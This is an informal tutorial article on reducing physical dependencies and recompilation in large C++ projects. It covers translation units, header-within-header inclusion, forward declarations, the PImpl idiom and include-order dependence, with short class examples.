During the development of a project, we usually talk about the design of classes, discussing in terms of design pattern, and describe the relationship among the classes. But most of the times we are not concern about the files, in which those classes are written. In any large-scale project, it is not also worth full to study the physical design of the project, but in some cases, where the project size is very huge, it in inevitable. It is very common in large-scale project, that it has some general-purpose classes, which are useful in other projects too. So natural solution to use those classes in other projects are to make those classes in separate files. It is common practice of C++ users to make two files for one class, one file contains definitions, and the other has implementation of class and its member functions. Such as a Point class will be something like this But if you didn't program carefully then sometimes it is not possible to just include these two files in other project and use it. One of the most common problem that may arise is to use include some other definition files too in your project which you might not needed. And other files may also need some other files, so at the end you may have to include a bunch of files to just use one single class. One example of the is that you might want to use Database class, which is created in some library or DLL, then you might also need to include the definition files of some other classes in that library such as RecordSet.H, DBFactory.H and DBException.H etc. Situation is even worse if you have to include the definition files of different Database classes such as OralceInterface.H, SQLInterface.H and SybaseInterface.H etc. It is better to see carefully which files are included in files. Especially which files are included in Definition file (Header file)? Because if you change anything in any definition file then all the files, weather it is Definition file or Implementation file, needs to recompile. For compilers prospective, a CPP file with all preprocessor expended, it is called translation unit. In other words, translation unit is an Implementation file with all the definition files included. Here is one such example of translation unit. Now if you change anything in any of the definition file, which is included in Camera.CPP, it means you have changed this translation unit and now it has to be recompiled. Situation becomes more serious if these definition files are included in more than one translation units now the change in one definition file needs to recompile all those translation units. Changes in definition files can be minimized if we use them only for definition not for implementation. "In other words implementation of a function should not be in header file even if it is only one line function. If performance is concerned, then that function can be declared inline explicitly. Now if there is any change in the implementation of the function only, then compiler will recompile only that translation unit". However, in other case, the change of implementation of function means recompile all translation units, which have this header file. If one header file is included in other header file, then change the first header file will change all the files which include either first file or second. Situation becomes even worst when header file included another header file, which includes another header file and so on. Now change in one file may need to compile not limited to one file only, but it may recompile the whole project. This diagram shows this concept clearly. No matter your Camera class does not include Point.H or ViewPort.H directly, but in fact it is included in Camera translation unit. Now change in Point header file will compile not only Camera translation unit, but also all translation units in this example. Basic rule of thumb to minimize physical dependencies is, "Try to avoid inclusion of header file within a header file until you don't have any other option". But how can we make compiler happy when we are not including header file? To see the answer of this question, we first understand in which cases we are force to include header file and in which cases we can avoid it. You have to include the header file when you need the full detail of the class. In other words you have to include header file when you are access member function or variable of a class, inherit from a class or aggregate its object in another class. We have already decided not to write implementation code in header file; so first case will automatically be eliminated. If you use another object in member functions only, either creating its local object or use it's as a parameter, or contain pointer of another class, then you do not need to include its header file. To make compiler happy too, you can just do forward deceleration of that class in the header file. Now we can restate our basic rule to minimize physical dependencies are "Use Forward deceleration instead of include header file wherever possible, such as in case when you are not inheriting a class or aggregate it in another class". For example in this case we have to include Point header file in ViewPort header file. #include "Point.h" class ViewPort { public: // Other functions private: // other attributes Point m_PtLeftTop; Point m_PtRightBottom; }; class ViewPort; class Transformation { public: void Scale(int p_x, int p_y, ViewPort& p_viewPort); // other functions }; You can further reduce the physical dependencies by make pointer of a class rather than making the object of a class. Because in case of pointer compiler does not need full detail in header file and it can be totally eliminated. But in this case you have to create and destroy object yourself, as well as there is an extra overhead of function calling. In addition this physical design might not fit very well to your logical design, because you are not doing inheritance, therefore you cant access protected data of a class, and cannot override virtual functions. This technique is also known as "Pointer to Implementation Principle" or in short "PImpl Principle". There might be one solution to avoid inclusion header within a header. Include all header files in the cpp file before include its own header file. Take a look at above example, ViewPort.H need Point.H file. Now include this header file in ViewPort.CPP before include ViewPort.H file. // ViewPort.CPP #include "Point.h" #include "ViewPort.h" And happy compile this unit. But there are two problems in this approach, first you have to include header files in proper order, i.e. have to remember the dependencies of header file and include it in proper order and program will not recompile even if you includes all the required header files in not proper order. The second problem is even more problematic, if you want to use ViewPort.H in any other translation unit then that translation unit will not compile until you include Point.H. From physical point of view you haven't change anything, but also create more problems by introducing dependencies among header files, which are hard to remember. Here is one more rule of thumb for manage physical dependencies "Never make any files which are dependent on the order of header file.
http://www.codeproject.com/Articles/6527/Manage-Physical-Dependencies-of-a-Project-to-reduc?fid=36313&df=90&mpp=10&sort=Position&spc=None&noise=1&prof=True&view=None
CC-MAIN-2015-32
refinedweb
1,253
60.85
Hi, Now i'm doing my Machine Learning job about k-NN and k-Means. I need to create graphics about my data coordinate. Basically, i don't have any idea to create this. Is there anyone can help? This will get you started... // Fig. 12.5: ShowColors.java // Demonstrating Colors. import java.awt.*; import javax.swing.*; public class ShowColors extends JFrame { // constructor sets window's title bar string and dimensions public ShowColors() { super( "Using colors" ); setSize( 400, 130 ); setVisible( true ); } // draw rectangles and Strings in different colors public void paint( Graphics g ) { // call superclass's paint method super.paint( g ); // set new drawing color using integers g.setColor( new Color( 255, 0, 0 ) ); g.fillRect( 25, 25, 100, 20 ); g.drawString( "Current RGB: " + g.getColor(), 130, 40 ); // set new drawing color using floats g.setColor( new Color( 0.0f, 1.0f, 0.0f ) ); g.fillRect( 25, 50, 100, 20 ); g.drawString( "Current RGB: " + g.getColor(), 130, 65 ); // set new drawing color using static Color objects g.setColor( Color.BLUE ); g.fillRect( 25, 75, 100, 20 ); g.drawString( "Current RGB: " + g.getColor(), 130, 90 ); // display individual RGB values Color color = Color.MAGENTA; g.setColor( color ); g.fillRect( 25, 100, 100, 20 ); g.drawString( "RGB values: " + color.getRed() + ", " + color.getGreen() + ", " + color.getBlue(), 130, 115 ); } // end method paint // execute application public static void main( String args[] ) { ShowColors application = new ShowColors(); application.setDefaultCloseOperation( JFrame.EXIT_ON_CLOSE ); } } // end class ShowColors /************************************************************************** * (C) Copyright 1992-2003 by Deitel & Associates, Inc. and * * Prentice Hall. All Rights Reserved. * * * *. * *************************************************************************/ @ hfx642 not, never do that and use paint() in Swing, correct is paintComponent() Hey... It's just a cut and paste from the publisher. Besides... Isn't paintComponent() specific to components? A graphic isn't a component. As in the example above, I use paint() all the time and have had no issues. @hfx642 wrote Besides... Isn't paintComponent() specific to components? well right for Awt Component there is method paint(), but your example is too old and shows JFrame and for Swing is here method paintComponent(), but for ContentPane is method paint(); A graphic isn't a component. right that its method and have had no issues. that's example and majorities of examples works up to today, that's nothing to do with reall working code. ...
https://www.daniweb.com/programming/software-development/threads/363864/how-to-create-graphic
CC-MAIN-2017-26
refinedweb
377
62.04
Using Blocks In Objective-C 2.0, blocks refer to a language construct that supports “closures,” a way of treating code behavior as objects. First introduced to iOS in the 4.0 SDK, Apple’s language extension makes it possible to create “anonymous” functionality, a small coding element that works like a method without having to be defined or named as a method. This allows you to pass that code as parameters, providing an alternative to traditional callbacks. Instead of creating a separate “doStuffAfterTaskHasCompleted” delayed execution method and using the method selector as a parameter, you can use blocks to pass that same behavior directly into your calls. This has two important benefits. First, blocks localize code to the place where that code is used. This increases maintainability and readability, moving code to the point of invocation. This also helps minimize or eliminate the creation of single-purpose methods. Second, blocks allow you to share lexical scope. Instead of explicitly passing local variable context in the form of callback parameters, blocks can implicitly read locally declared variables and parameters from the calling method or function. This context-sharing provides a simple and elegant way to specify the ways you need to clean up or otherwise finish a task without having to re-create that context elsewhere. Defining Blocks in Your Code Closures have been used for decades. They were introduced in Scheme (although they were discussed in computer science books, papers, and classes since the 1960s), and popularized in Lisp, Ruby, and Python. The Apple Objective-C version is defined using a caret symbol, followed by a parameter list, followed by a standard block of code, delimited with braces. Here is a simple use of a block. It is used to show the length of each string in an array of strings: NSArray *words = [@"This is an array of various words" componentsSeparatedByString:@" "]; [words enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) { NSString *word = (NSString *) obj; NSLog(@"The length of '%@' is %d", word, word.length); }]; This code enumerates through the “words” array, applying the block code to each object in that array. The block uses standard Objective-C calls to log each word and its length. Enumerating objects is a common way to use blocks in your applications. This example does not highlight the use of the idx and stop parameters. The idx parameter is an unsigned integer, indicating the current index of the array. The stop pointer references a Boolean value. When the block sets this to YES, the enumeration stops, allowing you to short-circuit your progress through the array. Block parameters are defined within parentheses after the initial caret. They are typed and named just as you would in a function. Using parameters allows you to map block variables to values from a calling context, again as you would with functions. Using blocks for simple enumeration works similarly to existing Objective-C 2.0 “for in” loops. What blocks give you further in the iOS SDK 4 APIs are two things. First is the ability to perform concurrent and/or reversed enumeration using the enumerateObjectsAtIndexes:options:usingBlock: method. This method extends array and set iteration into new and powerful areas. Second is dictionary support. Two methods (enumerateKeysAndObjectsUsingBlock: and enumerateKeysAndObjectsWithOptions:usingBlock:) provide dictionary-savvy block operations with direct access to the current dictionary key and object, making dictionary iteration cleaner to read and more efficient to process. Assigning Block References Because blocks are objects, you can use local variables to point to them. For example, you might declare a block as shown in this example. This code creates a simple maximum function, which is immediately used and then discarded: // Creating a maximum value block float (^maximum)(float, float) = ^(float num1, float num2) { return (num1 > num2) ? num1 : num2; }; // Applying the maximum value block NSLog(@"Max number: %0.1f", maximum(17.0f, 23.0f)); Declaring the block reference for the maximum function requires that you define the kinds of parameters used in the block. These are specified within parentheses but without names (that is, a pair of floats). Actual names are only used within the block itself. The compiler automatically infers block return types, allowing you to skip specification. For example, the return type of the block in the example shown previously is float. To explicitly type blocks, add the type after the caret and before any parameter list, like this: // typing a block float (^maximum)(float, float) = ^float(float num1, float num2) { return (num1 > num2) ? num1 : num2; }; Because the compiler generally takes care of return types, you need only worry about typing in those cases where the inferred type does not match the way you’ll need to use the returned value. Blocks provide a good way to perform expensive initialization tasks in the background. The following example loads an image from an Internet-based URL using an asynchronous queue. When the image has finished loading (normally a slow and blocking function), a new block is added to the main thread’s operation queue to update an image view with the downloaded picture. It’s important to perform all GUI updates on the main thread, and this example makes sure to do that. // Create an asynchronous background queue NSOperationQueue *queue = [[[NSOperationQueue alloc] init] autorelease]; [queue addOperationWithBlock: ^{ // Load the weather data NSURL *weatherURL = [NSURL URLWithString: @""]; NSData *imageData = [NSData dataWithContentsOfURL:weatherURL]; // Update the image on the main thread using the main queue [[NSOperationQueue mainQueue] addOperationWithBlock:^{ UIImage *weatherImage = [UIImage imageWithData:imageData]; imageView.image = weatherImage;}]; This code demonstrates how blocks can be nested as well as used at different stages of a task. Take note that any pending blocks submitted to a queue hold a reference to that queue, so the queue is not deallocated until all pending blocks have completed. That allows me to create an autoreleased queue in this example without worries that the queue will disappear during the operation of the block. Blocks and Local Variables Blocks are offered read access to local parameters and variables declared in the calling method. To allow the block to change data, the variables must be assigned to storage that can survive the destruction of the calling context. A special kind of variable, the __block variable, does this by allowing itself to be copied to the application heap when needed. This ensures that the variable remains available and modifiable outside the lifetime of the calling method or function. It also means that the variable’s address can possibly change over time, so __block variables must be used with care in that regard. The following example shows how to use locally scoped mutable variables in your blocks. It enumerates through a list of numbers, selecting the maximum and minimum values for those numbers. // Using mutable local variables NSArray *array = [@"5 7 3 9 11 13 1 2 15 8 6" componentsSeparatedByString:@" "]; // assign min and min to block storage using __block __block uint min = UINT_MAX; __block uint max = 0; [array enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) { // update the max and min values while enumerating min = MIN([obj intValue], min); max = MAX([obj intValue], max); // display the current max and min NSLog(@"max: %d min: %d\n", max, min); }]; Blocks and Memory Management When using blocks with standard Apple APIs, you will not need to retain or copy blocks. When creating your own blocks-based APIs, where your block will outlive the current scope, you may need to do so. In such a case, you will generally want to copy (rather than retain) the block to ensure that the block is allocated on the application heap. You may then autorelease the copy to ensure proper memory management is followed. Other Uses for Blocks In this section, you have seen how to define and apply blocks. In addition to the examples shown here, blocks play other roles in iOS development. Blocks can be used with notifications (see example in Chapter 1), animations, and as completion handlers. Many new iOS 4 APIs use blocks to simplify calls and coding. You can easily find many block-based APIs by searching the Xcode Document set for method selectors containing “block:” and “handler:”.
http://www.informit.com/articles/article.aspx?p=1765122&seqNum=8
CC-MAIN-2020-10
refinedweb
1,350
52.49
If I type this in: int val = abs(55); I get an error and an editor hint that offers to create a method called abs(). I would like to also get an editor hint that offers to do a static import of java.lang.Math.abs (and perhaps another hint for a static import of java.lang.Math.*). This would be great... although in my case I would like to be given the hint to convert a "normal" use of a static method into a statically imported one. That should be a lot more trivial as there is no need to keep all valid method names in memory or anything. I'm keen to have this as a hint. I have pretty much given up on static imports because they are such a pain in NetBeans. If nobody is currently working on this, I would greatly appreciate a pointer in the right direction so that I could perhaps look at implementing the functionality of turning an explicit use of a static method into a static import. e.g. if I have the code int val = Math.abs(55); I'd like the hinter to offer to turn Math.abs into a static import. More power to you if you work on this, fommil! The general lack of support for static imports in NetBeans is really grating. Has this been assigned to anyone? is anybody considering this for a milestone? It would be really really nice to have! NetBeans support for static imports is really quite poor due to the lack of this feature. In anybody looking at this? In Eclipse, one can set a bunch of your "favourite static imports", which offers the functionality that the original poster is requesting. That combined with a simple hint to convert a long-hand static method use, to a static one, would be all the static import support I'd need. After getting acquainted with the java.editor and java.hints module codebases, I believe this RFE is four-fold and should fall under the title "better support for static imports":- 1) The Java Completer should offer static methods for completion as if they were local. I believe this already happens for already imported static methods, but it should also do this for static methods from user-specified classes, potentially with NetBeans shipping a good stock supply as default. This requires a UI similar to the new "Java Code Completer Excluder" that I added as part of bug 125060 (latest UI not yet committed). 2) The Java Hints system should consider the possibility that methods which are undeclared in the local context may be available as static imports from elsewhere (maybe just from the user-defined path), and therefore a hint should be offered to take the appropriate action. This resolves the original poster's example. 3) The Java Editor Auto Import function dovetails with point 2. 4) A Java Hint for converting OldStyle.staticMethodInvocation() -> staticMethodInvocation() with static import, potentially a function that performs this for an entire file. I'm considering taking this RFE on as my second significant patch to the NetBeans codebase. jlahoda are you ok remaining the assignee with me attaching patches (against main-golden) here for feedback? This will span java.editor and java.hints. Initial advice is welcome! Great, fommil! Some more comments: - The hint (point 4) for converting usages of static methods should only be visible when the cursor is on the respective expression, much like for Assign Return Value To New Variable. Maybe that goes without saying. The point is that static imports are not always desirable, e.g. for EnumSet.of(…), therefore source files shouldn't be displayed sprinkled with corresponding warnings/hints. - As a fifth point, there is Fix Import which should offer static import suggestions for unresolved local method calls. (Maybe that's what you meant with point 3?) - There's also the issue of where static imports are auto-inserted in the list of import directives. Currently auto- insertion of ordinary imports ignores static imports when searching for where to insert the import directive. It would probably be useful to provide different options here (or really good heuristics). Some people prefer static imports to be mixed with ordinary imports, although the comb-like structure due to the "static" keyword makes the imports list less readable. Other people prefer the static imports before the ordinary imports, others prefer after. This is also often project specific. See for example Eclipse's Organize Imports configuration dialog which I believe provides support for all of this. @matthies thank for your comments Re: visibility, "mouseover" will be the default but users will be able to change this in the hints config menu. A blacklist could potentially be used to avoid hints altogether. Re: fix imports, I never knew NB did this :-) Re: sort support. Hmm, have you seen my bug 125566 report? I believe "sorting members" is part of Eclipse's functionality here... and something I miss since moving over (except sorting of enum ordinals!). @fommil: For re-ordering imports, extending the functionality of Fix Imports, there's already issue 122109. Although there is some overlap, I believe this should remain a separate issue from better support for static imports. But choosing an ordering is already necessary for the latter. As for your issue 125566, I prefer specific code fixes/refactorings to be kept separate from whole-file source formatting/prettyfication. Of course auto-generation of code (such as import directives) should result in nice source code (hence inserting import directives according to some ordering), but it shouldn't modify other parts of the source. (For non-final variables I'd probably like warnings and a dedicated refactoring command.) See also issue 156460. thanks for the pointer to issue 122109, I'm now CCd. Not so keen on 156460 although I agree that non-final fields (that can be made final) could do with a warning. First of all, let me say that this may be a major undertaking. Looking at your proposal, I do not like that the user would be required to set classes for which the static import related features would work. From user's point of view, this does not seem right. An issue here is that although the current index contains symbols (methods and fields) for user classes, it does not contain them for classes indexed from jar files, due to performance concerns. It might be possible to index only static members for classes from jars, but that needs to be investigated (from performance and API point of view). To the individual mentioned parts: 1. (code completion) I think that the unimported methods should be shown only for "all" code completion, similarly to unimported types. 2.+3. (imports) actually, imports handling is mostly done in ComputeImports (java.editor), the hint and fix-all-imports features are only views over the data provided by ComputeImports. Although the features may need some tweaks to present the static imports in a user-friendly way, the hard work will likely be in ComuteImports. 4. (convert to static import hint) I agree with matthies - this should be a caret sensitive hint, at most. Possibly should be disabled by default, so that it would not annoy users that do not want to use static imports. Also note that there are experiments on batch application of hints (see "batch" package in contrib/javahints). Another area that may need changes (and is related to #125566) is import analysis. When a NB plugin generates Java code, it is supposed to use Java infratructure, especially TreeMaker and WorkingCopy.rewrite(). When TreeMaker.QualIdent(Element) is used (or TreeMaker.Type(TypeMirror)), the infrastructure handles the imports for the client. This is performed in ImportAnalysis2 (java.source) and it will likely be necessary to adjust this class for static imports, otherwise code generated through the API will not use static imports (this expects that the client creates QualIdent for the method/field itself, not for its enclosing type, but if it does not, it is a bug in the client). Also, GeneratorUtilities.import{FQNs|Comments} may need to be fixed. @jlahoda, thanks for your comments I'll take them on board... will certainly need help with this RFE and might put it off for a bit, or at least break it into manageable chunks. Re: user specified classes, this is what Eclipse does and it works surprisingly well. Every coder has a few static utility methods that they tend to use a *lot*. The idea is that the user would add those. In my case, I'd probably add a few methods from Preconditions (part of google-collections). I don't think that functionality is the core of this RFE... the core functionality comes from the ability to convert a Class.staticMethod -> staticMethod with static import. Hints "off" by default is a serious option, but when implemented I'd like to have a poll to see if the majority of users would prefer a mouseover hint by default. I am tempted to install the latest version of Eclipse to see what they are doing with regards to static importing. I recall their support was far superior to Netbeans. I'm starting with a hint to offer a static import. Expect a patch over the next week or so at the latest. I've hit a problem and could do with some help. Working out whether or not a METHOD_INVOCATION is actually declared in a qualified way, e.g. Math.abs() vs abs() + static import is actually quite tricky. The only way I seem to be able to do this is to use getSourcePositions and see if there is a "." in the text! That's a horrible solution IMHO, are there any ways to do this using the Compiler Tree API? Other than that... I've got code working that does the detection and currently returns a do-nothing fix. I agree that user-specified "favorites" for static imports are useful and work well. My co-workers that use Eclipse love them. There needs to be project-specific settings though, or at least the suggested imports must be restricted to the ones available from the libraries and sources of the current project. There's an increasing number of APIs that are designed assuming static imports, in particular ones providing internal DSLs (like this:), and that are cumbersome to use when static imports have to be added by hand every time. In our team, NetBeans has already become an impediment here, and for some developers it's becoming a serious incentive to switch to Eclipse. So, fommil, your work is really appreciated! I'm attaching a patch in a moment which implements the hint to convert Klass.staticMethod -> staticMethod. i.e. point 4 in my previous post. Try it out on the Test code at the end of this update. This hint is intended only to convert qualified accesses of static methods to static imports, it is not intended to work if the containing class is not already imported/resolved. Either this hint could offer to do the import of the containing class, or that support should be added to the errors hints. My preference would be with the latter... and that will be the next thing I'll look at. There will obviously be a lot of code duplication, so I'll aim to move a lot of this functionality into somewhere accessible by both. I have several comments and questions:- - how can I discover if the current source level supports static imports? - how can I discover if the MethodInvocationTree or ExpressionTree is actually resolved (i.e. their containing class is imported)... I'd like to exit if not, because that should be a job for the error hints. - is there a better way to discover if a static method is being accessed in a qualified way? The current technique of calling .contains(".") on the ExpressionTree.toString seems really hacky. - is it OK to assume the form of ImportTree.getQualifiedIdentifier().toString()? The form is not documented, but I found other NB code doing similarly. - do java.hints run() methods really have to start with a treePath.getLeaf().getKind() sanity check? Shouldn't we be able to trust the framework to only send us TreePaths that we ask for in getTreeKinds()? - related to previous; is a similar sanity check also required after calling the TreePathHandle.resolve? - JavaFixAllImports.addImports doesn't support static imports. Also, it is directly copied from SourceUtils.addImports! I can't see how to upgrade this code to support static imports... meaning I'll be forced to introduce further code duplication. Anyone have any alternatives? ======== public class Test { public Test(String blah) { int abs = Math.abs(1); Test.doStuff(); Calendar.getInstance(); } public static void doStuff(){ } } Created attachment 80550 [details] first attempt I'd like to NetFIX [1] this bug. Is it possible? [1] Some notes to the patch: > // XXX is this sanity check needed? Yes it is. The resolver is not 100%. > // TODO ignore case where source code is less than Java 1.5 We're preparing a method added to CompilationInfo. > // XXX can't use JavaFixAllImports.addImports because no support for static imports > // XXX smart insertion We have to find a better way to do this. Ideally, make SourceUtils.addImports public and make it work with this. I'll give this a try soon. I was hoping you'd say that about SourceUtils.addImports ;-) The following is a good test bed for the "hint" part of this feature ==================== import java.util.logging.Logger; import javax.crypto.KeyAgreement; import static java.util.Calendar.*; public class Test { public Test(String blah) throws Exception { // should only change identifier, no import DONE int abs = Math.abs(1); // should only change identifier, no import DONE Test.getLogger(); // should not offer to do static import (name clash with local) DONE Logger.getLogger(""); // should not offer to do static import (unresolved) XXX EnumSet.of(null); // should not offer to do static import (name clash with existing static import) XXX KeyAgreement.getInstance(""); } public static void getLogger(){ } } Created attachment 80898 [details] improvements in "pure hint", no handling errors I considered many more scenarios and the following is the latest test bed. Again, this hint is not intended to work as an "error hint", that will be dealt with separately. In the meantime... anyone know how to exit early if the identifier is not resolved? ========================= import java.util.Calendar; import java.util.Collections; import java.util.logging.Logger; import javax.crypto.KeyAgreement; import static java.util.Calendar.*; public class Test extends Foo { public Test(String blah) throws Exception { // should only change identifier, no import DONE int abs = Math.abs(1); // should only change identifier, no import DONE Test.getLogger(); // should only change identifier, no import DONE Foo.foo(); // should only change identifier, no import DONE Calendar.getAvailableLocales(); // should change identifier and import DONE Collections.emptyList(); // should not offer a static import, name clash with local DONE Logger.getLogger(""); // should not offer a static import, name clash with imported DONE KeyAgreement.getInstance(""); // should not offer a static import, name clash with inherited DONE Bar.foo(); // should not offer a static import, unresolved XXX EnumSet.of(null); } public static void getLogger() { } } class Foo { static protected void foo() { } } class Bar { static protected void foo() { } } Created attachment 80899 [details] hack to ignore error cases Created attachment 80922 [details] consider inner classes, addStaticImport in SourceUtils My last test bed post was a bit of a "brain fart", please ignore... this class is a much better test bed as it tests behaviour for inner/static classes. For me, patch 4 behaves as expected where you see DONE, but I need to do a full recompile to confirm as I'm getting odd compile errors in java.source (not my fault!). ======================== import java.util.Calendar; import java.util.Collections; import java.util.logging.Logger; import javax.crypto.KeyAgreement; import static java.util.Calendar.*; public class Test extends Foo { void doStuff() throws Exception { // should change identifier and import DONE Math.abs(1); Collections.emptySet(); // should only change identifier, no import DONE Test.getLogger(); // should only change identifier, no import DONE Foo.foo(); // should only change identifier, no import DONE Calendar.getAvailableLocales(); // should not offer a static import, name clash with local DONE Logger.getLogger(""); // should not offer a static import, name clash with inherited DONE Bar.foo(); // should not offer a static import, name clash with imported DONE KeyAgreement.getInstance(""); // should not offer a static import, unresolved DONE EnumSet.of(null); } public static void getLogger() { }() { } } Grr... typo in last patch, line 115 of StaticImport.java should have reversed logic, i.e. if (!isSubTypeOrInnerOfSubType(info, klass, enclosingEl)) { Apologies. Since it was only a beta patch, I'll not upload a correction just yet. Also, aesthetic, but variable in 'isStatic' in SourceUtils is better described as being called 'ignore'. Created attachment 81017 [details] integrated with the error hinter and considered more use cases Latest patch now integrates with the error hinter, yay! I still need a way to detect the source version >= 1.5. I have an outstanding query on the mailing list which should clear up the METHOD_SELECT issue in ImportClass, see- MEMBER_SELECT-not-a-MemberSelectTree--tt23266103.html Next step is to convert the follow test file into a series of unit tests, then I think I'll create a separate issue for improvements to the completer:- ================== import java.util.Calendar; import java.util.logging.Logger; import javax.crypto.KeyAgreement; import static java.util.Calendar.*; /** * @author Sam Halliday * @see <a href="">issue 89258</a> */ public class Test extends Foo { void doStuff() throws Exception { // should change identifier and import DONE Math.abs(1); // should only change identifier, no import DONE Test.getLogger(); // should only change identifier, no import DONE Foo.foo(); // should only change identifier, no import DONE Calendar.getAvailableLocales(); Calendar.getInstance(); // should not offer a static import, name clash with local DONE Logger.getLogger(""); // should not offer a static import, name clash with inherited DONE Bar.foo(); // should not offer a static import, name clash with imported DONE KeyAgreement.getInstance(""); // hint should not offer a static import, unresolved DONE // error hint should offer a static import DONE Collections.emptySet(); // hint should not offer a static import, unresolved DONE // error hint should not offer a static import, local name clash DONE EnumSet.of(); // hint should not offer a static import, unresolved DONE // error hint should not offer a static import, imported name clash DONE MessageDigest.getInstance("SHA"); // hint should not offer a static import, unresolved DONE // error hint should not offer a static import, target doesn't exist XXX Collections.doesNotExist(); } public static void getLogger() { } public static void of() { }() { } } @jlahoda I'm going to keep working on this despite the feature freeze. Just to let you know I'm not expecting 6.7 inclusion ;-) Created attachment 81414 [details] started creating unit tests Created attachment 81437 [details] added test cases, ready for review I'm very happy with the latest patch upload. It now has extensive test coverage. I realise 6.7 is now closed for new RFEs, so I won't push for inclusion... but it is sitting here ready for integration ;-) A few quick comments: 1. // XXX is this sanity check needed? (for Tree.Kind in run method of hint) - this is actually not needed at runtime, but the computeErrors method in TreeRuleTestBase can be generally called for any TreePath (esp. for the four generic tests defined in TRTB). If computeErrors verifies the Tree.Kind, the check is not need in the hint. 2. I am not much in favor of making SourceUtils.addImports method(s) public. The main reason is that I do not see any client for these methods aside the java.source, java.editor and java.hints. And, if the method will be there, other clients may be tempted to use these methods instead of proper TreeMaker.Type/QualIdent (making the code worse to maintain, throughout the IDE). IIRC, this was the main concern before 6.0, maybe not so important now (clients learned the advantages for TM.Type/QualIdent), but still should be considered. 3. There is usually no need to keep compatibility inside the implementation packages (JavaFixAllImports.addImports), simply fixing all uses should be enough. I will try to go through the patch more deeply soon. What about the other features, btw? Created attachment 81548 [details] same as last, but bump up revision number in file name @jlahoda I think you were looking at an older version of the patch... sorry, I got a little carried away with updates to this page, a lot of questions appear unanswered but I got responses from the mailing list if not here. I also noticed that I didn't change the name of the latest patch to indicate that it was the latest, please look at java.hints-static_import-7.diff only. I created a separate issue 164487 for the Java Completer part of this RFE as it is much more involved. That would provide a UI to allow users to manually specify classes that can be statically imported. Implementing this will involve pulling some helper methods from java.hints into java.{source, editor}. I created a separate issue 89258 for full classpath search for static methods. Admittedly, this is what the OP was asking for, I should really have created a separate RFE for the hint part, but it wasn't clear what the dependency chain looked like until work began. Sorry @gsporar if you've felt spammed, but we are closer to a solution than when you submitted the RFE ;-) Issue 122109 tracks the reordering of static imports. Re: SourceUtils.addImports I have no strong feelings one way or the other, but somebody recommended making it public and the code duplication in java.editor was concerning. Is there a way to turn this into a maintainable API method? Honzo, can you comment on this? Thanks! The non-error hint part of this was added to the "contrib" branch in the following commit Users should be able to use the build by adding the following UNSTABLE Update Center I'd like to see the support in this patch (and in contrib) extended to handle members, not just methods. Any update on this Honzo? Thanks! *** Issue 174782 has been marked as a duplicate of this issue. *** *** Issue 66669 has been marked as a duplicate of this issue. *** (arriving here from #174782). Nice duplicate. We are now almost 100.000 bug reports later, and this issue is not yet resolved. Seems to be almost useless to submit P3 bug reports. Make it P2 to give it more visibility. While we wait for this patch to be accepted in the main NetBeans source, there is an Experimental Hint giving this support. Please feel free to add the following plugin to your Netbeans Tools -> Plugins -> Settings list, it will give you access to the "Java Experimental Hints" plugins, providing some time-saving features None of the plugins will be enabled by default. As well as enabling "Static Imports", I also recommend "Serializable". Sam, if you will agree, I will put the hint from contrib into std. NetBeans distribution. Regarding the error fix (i.e. on unresolvable method/field), I still think this should be done primarily in ComputeImports, so that all import-related features could benefit from that. Also, I still think that the hint should be able to work without any user customization (such customization may be optional, but should not be required, IMO). But maybe bug #164490/#71249 was supposed to cover this? @jlahoda thanks! Re: error handling, please feel free to look at some of the older patches against main to see how I was intending this to be implemented - should save you some time. I will not be offended if you do what you feel is best. Re: other issues. That was exactly the point of creating them :-) I have moved the StaticImport hint to std. distro: I have removed it from contrib: As there are other bugs (bug #164487, bug #71249) for the other features needed to support static import, I think we can close this one. Thanks a lot Honzo and more importantly thanks Sam for your patch! Integrated into 'main-golden', will be available in build *200912100200* on (upload may still be in progress) Changeset: User: Jan Lahoda <jlahoda@netbeans.org> Log: #89258: Sam Halliday's (fommil@netbeans.org) hint for conversion of qualified static method reference to import static and unqualified reference moved from contrib to trunk. Hi, I really like this feature, except that it doesn't import static fields. In fact I'd prefer for the code I'm working on now to have a hint for static fields but not for the methods. Is this still valid in 7. Created attachment 147920 [details] Patch: Introducing support for static imports for fields/enum-fields Please review the patch and commit. The patch introduces support for transforming static (enum) field references to use static imports. The patch also includes unit tests with obvious examples. Patch applied. Thanks for your contribution. Thank you Dusan and Benno! Can this be modified to exclude references to the static "class" variable? I just tried to run this, and i'm using the class objects fairly throughly, and this check suggested import static java.lang.String.class AND import static java.lang.Double.class. (In reply to ruckc from comment #59) > Can this be modified to exclude references to the static "class" variable? > I just tried to run this, and i'm using the class objects fairly throughly, > and this check suggested import static java.lang.String.class AND import > static java.lang.Double.class. I created a follow-up issue for this RFE
https://netbeans.org/bugzilla/show_bug.cgi?id=89258
CC-MAIN-2017-39
refinedweb
4,286
57.87
Connect a bot to Twilio You can configure your bot to communicate with people using the Twilio cloud communication platform. Log in to or create a Twilio account for sending and receiving SMS messages If you don't have a Twilio account, create a new account. Create a TwiML Application Create a TwiML application following the instructions. Under Properties, enter a FRIENDLY NAME. In this tutorial we use "My TwiML app" as an example. The REQUEST URL under Voice can be left empty. Under Messaging, the Request URL should be. Select or add a phone number Follow the instructions here to add a verified caller ID via the console site. After you finish, you will see your verified number in Active Numbers under Manage Numbers. Specify application to use for Voice and Messaging Click the number and go to Configure. Under both Voice and Messaging, set CONFIGURE WITH to be TwiML App and set TWIML APP to be My TwiML app. After you finish, click Save. Go back to Manage Numbers, you will see the configuration of both Voice and Messaging are changed to TwiML App. Gather credentials Go back to the console homepage, you will see your Account SID and Auth Token on the project dashboard, as shown below. Submit credentials In a separate window, return to the Bot Framework site at. - Select My bots and choose the Bot that you want to connect to Twilio. This will direct you to the Azure portal. - Select Channels under Bot Management. Click the Twilio (SMS) icon. - Enter the Phone Number, Account SID, and Auth Token you record earlier. After you finish, click Save. When you have completed these steps, your bot will be successfully configured to communicate with users using Twilio. Connect a bot to Twilio using the Twilio adapter As well as the channel available in the Azure Bot Service to connect your bot with Twilio, you can also use the Twilio adapter. In this article you will learn how to connect a bot to Twilio using the adapter. This article will walk you through modifying the EchoBot sample to connect it to Twilio. Note The instructions below cover the C# implementation of the Twilio adapter. For instructions on using the JS adapter, part of the BotKit libraries, see the BotKit Twilio documentation. Prerequisites - A Twilio account. If you do not have a Twilio account, you can create one here. Get a Twilio number and gather account credentials Log into Twilio. On the right hand side of the page you will see the ACCOUNT SID and AUTH TOKEN for your account, make a note of these as you will need them later when configuring your bot application. Choose Programmable Voice from the options under Get Started with Twilio. 